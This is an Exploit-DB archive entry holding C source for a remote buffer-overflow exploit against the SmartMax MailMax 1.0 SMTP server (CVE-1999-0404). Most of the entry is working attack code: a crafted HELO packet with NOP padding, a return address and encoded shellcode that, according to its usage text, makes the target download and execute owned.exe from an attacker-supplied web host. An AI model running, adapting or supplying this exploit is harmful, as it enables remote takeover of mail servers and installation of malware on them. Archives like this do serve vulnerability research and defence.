SmartMax MailMax 1.0 - SMTP Buffer Overflow

EDB-ID:

20600

CVE:

1999-0404

EDB Verified:

Author:

_mcp_

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

1999-02-13

Vulnerable App: 
// source: https://www.securityfocus.com/bid/2312/info

Smartmax MailMax is an email server for Windows 95/98/NT. It is vulnerable to buffer overflow attacks against the SMTP-command processing function. This can be exploited to execute arbitrary commands with the privileges of the SMTP process. 

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>

/* Mail-Max Remote Exploit by _mcp_ <pw@nacs.net>
This program must be run under x86 Linux

Greets go out to: Morpheus, Killspree, Coolg, Dregvant, Vio,
Wrl, #finite, #win32asm and anyone I may have missed, you know
who you are :).

You can reach me on efnet.

No greets go out to etl.

*/

char code[] =
"\xEB\x45\xEB\x20\x5B\xFC\x33\xC9\xB1\x82\x8B\xF3\x80\x2B\x1"
"\x43\xE2\xFA\x8B\xFB\xE8\xE9\xFF\xFF\xFF\xE8\xE4\xFF\xFF\xFF"
"\xEB\x29\x46\x58\xFF\xE0\xBB\x40\xA5\x1\x10\x56\xFF\x13\x8B"
"\xE8\x46\x33\xC0\x3A\x6\x75\xF9\x46\x40\x3A\x6\x74\xE5\x56"
"\x55\xBB\x54\xA5\x1\x10\xFF\x13\xAB\xEB\xE7\xEB\x4F\x33\xC9"
"\x66\x49\xC1\xC1\x2\x51\x33\xC0\x51\x50\xFF\x57\xE8\x8B\xE8"
"\x33\xC9\x51\x51\x51\x51\x57\xFF\x57\xF4\x33\xC9\x51\x51\x51"
"\x51\x56\x50\xFF\x57\xF8\x59\x57\x51\x55\x50\xFF\x57\xFC\x83"
"\xC6\x7\x33\xC9\x51\x56\xFF\x57\xDC\xFF\x37\x55\x50\x8B\xE8"
"\xFF\x57\xE0\x55\xFF\x57\xE4\x33\xC9\x51\x56\xFF\x57\xEC\xFF"
"\x57\xF0\xE8\x67\xFF\xFF\xFF\x4C\x46\x53\x4F\x46\x4D\x34\x33"
"\x1\x60\x6D\x64\x73\x66\x62\x75\x1\x60\x6D\x78\x73\x6A\x75"
"\x66\x1\x60\x6D\x64\x6D\x70\x74\x66\x1\x48\x6D\x70\x63\x62"
"\x6D\x42\x6D\x6D\x70\x64\x1\x58\x6A\x6F\x46\x79\x66\x64\x1"
"\x46\x79\x6A\x75\x51\x73\x70\x64\x66\x74\x74\x1\x2\x58\x4A"
"\x4F\x4A\x4F\x46\x55\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50"
"\x71\x66\x6F\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71"
"\x66\x6F\x56\x73\x6D\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75"
"\x53\x66\x62\x65\x47\x6A\x6D\x66\x1\x2\x69\x75\x75\x71\x3B"
"\x30\x30\x00";

    /*This is the encrypted /~pw/owned.exe we paste at the end */
char dir[] = "\x30\x7f\x71\x78\x30\x70\x78\x6f\x66\x65\x2F\x66\x79\x66\x1\x0";


unsigned int getip(char *hostname)
  {
  struct hostent *hostinfo;
  unsigned int binip;

  hostinfo = gethostbyname(hostname);

  if(!hostinfo)
    {
      printf("cant find: %s\n",hostname);
      exit(0);
    }
  bcopy(hostinfo -> h_addr, (char  *)&binip, hostinfo -> h_length);
  return(binip);
  }


int usages(char *fname)
{						
      printf("Remote Mail-Max exploit v1.0 by _mcp_ <pw@nacs.net>.\n");
      printf("Usages: \n");
      printf("%s <target host> <http site> <offset> <return address>\n",
fname);
      printf("All known versions offset = 539, Return address = 79887315\n");
      printf("Will make target download, save, and execute http://<http site>/~pw/owned.exe\n");

exit(0);

}


main (int argc, char *argv[])
{
  int sock,filedesc,offset,targethost,sinlen,codelength;
  struct sockaddr_in sin;
  unsigned char buffer[8000];
  char ipbuffer[16];
  unsigned char *ptr,*ptr2;
  unsigned long ret_addr;
  int len,x = 1;
  unsigned long address;

  if (argc < 5) usages(argv[0]);

  targethost = getip(argv[1]);


   len = strlen(argv[2]);
    if (len > 60)
     {
       printf("Bad http format!\n");
       usages(argv[0]);
     }

   ptr = argv[2];
   while (x <= len)
      {
        x++;
        (*ptr)++;           /*Encrypt the http ip for later parsing */
        ptr++;
      }

  offset = atoi(argv[3]);
  ret_addr = atol(argv[4]);

  if (offset > 7000)
     {

       printf("Offset too large.\n");
       exit(0);
     }

  sock = socket(AF_INET,SOCK_STREAM,0);

  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = targethost;
  sin.sin_port = htons(25);
  sinlen = sizeof(sin);


  printf("Starting to create the egg\n");
  ptr = (char *)&buffer;
  strcpy(ptr,"HELO ");
  ptr+=5;

  memset((void *)ptr, 0x90, 7000);

  ptr+=offset;
  memcpy ((void *) ptr,(void *)&ret_addr, 4);
  ptr+=60;
  memcpy((void *) ptr,(void *)&code,strlen(code));


  (char *) ptr2 = strstr(ptr,"\xb1");
  if (ptr2 == NULL)
     {
       printf("Bad shell code\n");
       exit(0);
     }
  ptr2++;
  (*ptr2)+= len + ( sizeof(dir) - 1 );

   (char *) ptr2 = strstr(ptr,"\x83\xc6");
     if (ptr2 == NULL)
      {
        printf("Bad shell code\n");
        exit(0);

      }

  ptr2+= 2;

  (*ptr2)+= len + 8;

  ptr+=strlen(code);
  memcpy((void *) ptr, (void *) argv[2], len);   /*Parse in the http
  site's info */
  ptr+=len;
  memcpy((void *) ptr,(void*) &dir, sizeof(dir) );
  printf("Made the egg\n");

    if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1)
     {
       perror("error:");
       exit(0);
     }
    printf("Connected.\n");

    write(sock, &buffer, strlen((char *)&buffer) );
    write(sock,"\r\n",2);
    sleep(1);
    printf("Sent the egg\n");
   close(sock);
   exit(1);
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services